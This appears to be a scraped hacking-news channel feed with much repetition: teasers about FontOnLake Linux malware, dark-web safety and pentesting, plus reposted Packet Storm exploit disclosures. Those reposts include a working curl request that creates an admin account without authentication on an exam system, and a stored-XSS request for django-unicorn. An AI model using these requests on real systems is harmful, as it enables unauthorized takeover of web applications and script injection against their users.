Dark Reading: Attacks/Breaches
'FontOnLake' Malware Family Targets Linux Systems
Researchers report that the location of its C2 server, the countries where samples were uploaded, may indicate targets include Southeast Asia.
___________________________
@hacking_Attack
@Hacking_Video
'FontOnLake' Malware Family Targets Linux Systems
Researchers report that the location of its C2 server, the countries where samples were uploaded, may indicate targets include Southeast Asia.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
'FontOnLake' Malware Family Targets Linux Systems
Researchers report that the location of its C2 server and the countries where samples were uploaded may indicate targets include Southeast Asia.
Deep Web
How do you know if a site on the deep web is reliable and not a scam? or just getting scammed in general.
submitted by /u/Playful-Foot3007
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
How do you know if a site on the deep web is reliable and not a scam? or just getting scammed in general.
submitted by /u/Playful-Foot3007
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
How do you know if a site on the deep web is reliable and not a...
Posted in r/deepweb by u/Playful-Foot3007 • 75 points and 53 comments
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
TryHackMe | Content Discovery Walkthrough
https://cdn-images-1.medium.com/max/600/1*8wzZxNuJTmamY8LzE5c-dg.png
Learn the various ways of discovering hidden or private content on a webserver that could lead to new vulnerabilities.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
TryHackMe | Content Discovery Walkthrough
https://cdn-images-1.medium.com/max/600/1*8wzZxNuJTmamY8LzE5c-dg.png
Learn the various ways of discovering hidden or private content on a webserver that could lead to new vulnerabilities.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
TryHackMe | Content Discovery Walkthrough
Learn the various ways of discovering hidden or private content on a webserver that could lead to new vulnerabilities.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How to secure my Facebook account from hack
It’s a great plan to have a say some extra layers of security on your Facebook account. A cheater might use your account information to…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
How to secure my Facebook account from hack
It’s a great plan to have a say some extra layers of security on your Facebook account. A cheater might use your account information to…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How to secure my Facebook account from hack
It’s a great plan to have a say some extra layers of security on your Facebook account. A cheater might use your account information to…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
The 6 Hats Explained
https://cdn-images-1.medium.com/max/1080/1*3JPn-c3UfEPUYMCZTIrTzg.jpeg
Black hat, white hat, grey hat, red hat, blue hat, and green hat. No, these aren’t items in an apparel store’s catalog — they’re the…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
The 6 Hats Explained
https://cdn-images-1.medium.com/max/1080/1*3JPn-c3UfEPUYMCZTIrTzg.jpeg
Black hat, white hat, grey hat, red hat, blue hat, and green hat. No, these aren’t items in an apparel store’s catalog — they’re the…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
The 6 Hats Explained
Black hat, white hat, grey hat, red hat, blue hat, and green hat. No, these aren’t items in an apparel store’s catalog — they’re the…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Reviewing the Practical Network Penetration Tester (PNPT) Course Pt. 3
https://cdn-images-1.medium.com/max/1500/1*3bKZFW1X01iYMNwdMUszdQ.jpeg
Covering the Ethical Hacking Methodology and Information Gathering Modules for the Practical Ethical Hacker course from TCM Security
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Reviewing the Practical Network Penetration Tester (PNPT) Course Pt. 3
https://cdn-images-1.medium.com/max/1500/1*3bKZFW1X01iYMNwdMUszdQ.jpeg
Covering the Ethical Hacking Methodology and Information Gathering Modules for the Practical Ethical Hacker course from TCM Security
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Reviewing the Practical Network Penetration Tester (PNPT) Course Pt. 3
Covering the Ethical Hacking Methodology and Information Gathering Modules for the Practical Ethical Hacker course from TCM Security
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Surf Dark Web Safely, Now!
https://cdn-images-1.medium.com/max/633/1*gL_yTtO3dzkkVWrng9TcuQ.png
The dark web is anything that is not index by normal search engines like Google, Bing, etc. The dark web is the dark corner of the whole…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Surf Dark Web Safely, Now!
https://cdn-images-1.medium.com/max/633/1*gL_yTtO3dzkkVWrng9TcuQ.png
The dark web is anything that is not index by normal search engines like Google, Bing, etc. The dark web is the dark corner of the whole…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Surf Dark Web Safely, Now!
The dark web is anything that is not index by normal search engines like Google, Bing, etc. The dark web is the dark corner of the whole…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Glimpse Into Web Penetration Testing
A web penetration testing example, that I did me and @Edd13Mora in our free time, for beginners to have an idea about websec.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Glimpse Into Web Penetration Testing
A web penetration testing example, that I did me and @Edd13Mora in our free time, for beginners to have an idea about websec.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Glimpse Into Web Penetration Testing
A web penetration testing example, that I did me and @Edd13Mora in our free time, for beginners to have an idea about websec.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Los investigadores advierten sobre el malware FontOnLake Rootkit dirigido a sistemas Linux
https://cdn-images-1.medium.com/max/1329/0*OGYN3Y3c0puxd5Tl
PUBLICADO EN 8 OCTUBRE, 2021POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Los investigadores advierten sobre el malware FontOnLake Rootkit dirigido a sistemas Linux
https://cdn-images-1.medium.com/max/1329/0*OGYN3Y3c0puxd5Tl
PUBLICADO EN 8 OCTUBRE, 2021POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Los investigadores advierten sobre el malware FontOnLake Rootkit dirigido a sistemas Linux
PUBLICADO EN 8 OCTUBRE, 2021POR EHACKING
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Simple Online College Entrance Exam System 1.0 Unauthenticated Admin Creation
https://4.bp.blogspot.com/-5kb4UTwsKkE/WWlvjussFoI/AAAAAAAAIQs/uqojaqb90NcMo4ROOoH-c5uvdKeDdbGswCLcBGAs/s1600/h94.png
Simple Online College Entrance Exam System version 1.0 suffers from an unauthenticated admin creation vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Simple Online College Entrance Exam System 1.0 Unauthenticated Admin Creation
https://4.bp.blogspot.com/-5kb4UTwsKkE/WWlvjussFoI/AAAAAAAAIQs/uqojaqb90NcMo4ROOoH-c5uvdKeDdbGswCLcBGAs/s1600/h94.png
Simple Online College Entrance Exam System version 1.0 suffers from an unauthenticated admin creation vulnerability.
MD5 |
28bb852e8a1687d8a35b3b246f572b51Download
# Exploit Title: Simple Online College Entrance Exam System 1.0 - Unauthenticated Admin Creation
# Date: 07.10.2021
# Exploit Author: Amine ismail @aminei_
# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux
# Unauthenticated admin creation
Unauthenticated admin creation:
Request:
POST /entrance_exam/Actions.php?a=save_admin HTTP/1.1
Host: 127.0.0.1
Content-Length: 42
id=&fullname=admin2&username=admin2&type=1
PoC to create an admin user named exploitdb and password exploitdb:
curl -d "id=&fullname=admin&username=exploitdb&type=1&password=916b5dbd201b469998d9b4a4c8bc4e08" -X POST 'http://127.0.0.1/entrance_exam/Actions.php?a=save_admin'
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Simple Online College Entrance Exam System 1.0 Unauthenticated Admin Creation
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
django-unicorn 0.35.3 Cross Site Scripting
https://2.bp.blogspot.com/-weqZA-ftzQE/WWlvbeJCv3I/AAAAAAAAIPM/_poAex3uv6ENktRwTJkjqdNNBZYRKBnvQCLcBGAs/s1600/h74.png
django-unicorn versions 0.35.3 and below suffer from persistent cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
django-unicorn 0.35.3 Cross Site Scripting
https://2.bp.blogspot.com/-weqZA-ftzQE/WWlvbeJCv3I/AAAAAAAAIPM/_poAex3uv6ENktRwTJkjqdNNBZYRKBnvQCLcBGAs/s1600/h74.png
django-unicorn versions 0.35.3 and below suffer from persistent cross site scripting vulnerability.
MD5 |
3e1eaca5d1e44c6dfb0341c2660a27afDownload
# Exploit Title: django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)
# Date: 10/7/21
# Exploit Author: Raven Security Associates, Inc. (ravensecurity.net)
# Software Link: https://pypi.org/project/django-unicorn/
# Version: <=
# CVE: CVE-2021-42053
django-unicorn <=
Step 1: Go to www.django-unicorn.com/unicorn/message/todo
Step 2: Enter an xss payload in the todo form (https://portswigger.net/web-security/cross-site-scripting/cheat-sheet).
POC:
POST /unicorn/message/todo HTTP/2
Host: www.django-unicorn.com
Cookie: csrftoken=EbjPLEv70y1yPrNMdeFg9pH8hNVBgkrepSzuMM9zi6yPviifZKqQ3uIPJ4hsFq3z
Content-Length: 258
Sec-Ch-Ua: "";Not A Brand"";v=""99"", ""Chromium"";v=""94""
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: application/json
X-Requested-With: XMLHttpRequest
X-Csrftoken: EbjPLEv70y1yPrNMdeFg9pH8hNVBgkrepSzuMM9zi6yPviifZKqQ3uIPJ4hsFq3z
Sec-Ch-Ua-Platform: ""Linux""
Origin: https://www.django-unicorn.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.django-unicorn.com/examples/todo
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
{""id"":""Q43GSmJh"",""data"":{""task"":"""",""tasks"":[]},""checksum"":""4ck2yTwX"",""actionQueue"":[{""type"":""syncInput"",""payload"":{""name"":""task"",""value"":""x ""}},{""type"":""callMethod"",""payload"":{""name"":""add""},""partial"":{}}],""epoch"":1633578678871}
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
HTTP/2 200 OK
Date: Thu, 07 Oct 2021 03:51:18 GMT
Content-Type: application/json
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
Via: 1.1 vegur
Cf-Cache-Status: DYNAMIC
Expect-Ct: max-age=604800, report-uri=""https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct""
Report-To: {""endpoints"":[{""url"":""https:\/\/a.nel.cloudflare.com\/report\/v3?s=b4nQavto8LK9ru7JfhbNimKP71ZlMtduJTy6peHCwxDVWBH2Mkn0f7O%2FpWFy1FgPTd6Z6FmfkYUw5Izn59zN6kTQmjNjddiPWhWCWZWwOFiJf45ESQxuxr44UeDv3w51h1Ri6ESnNE5Y""}],""group"":""cf-nel"",""max_age"":604800}
Nel: {""success_fraction"":0,""report_to"":""cf-nel"",""max_age"":604800}
Server: cloudflare
Cf-Ray: 69a42b973f6a6396-ORD
Alt-Svc: h3="":443""; ma=86400, h3-29="":443""; ma=86400, h3-28="":443""; ma=86400, h3-27="":443""; ma=86400
{""id"": ""Q43GSmJh"", ""data"": {""tasks"": [""x ""]}, ""errors"": {}, ""checksum"": ""ZQn54Ct4"", ""dom"": ""
\n\n\n\nAdd\n
\n\n
* x \n
\nClear all tasks\n
\n
\n"", ""return"": {""method"": ""add"", ""params"": [], ""value"": null}}"
"ENDTEXT"
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
django-unicorn 0.35.3 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.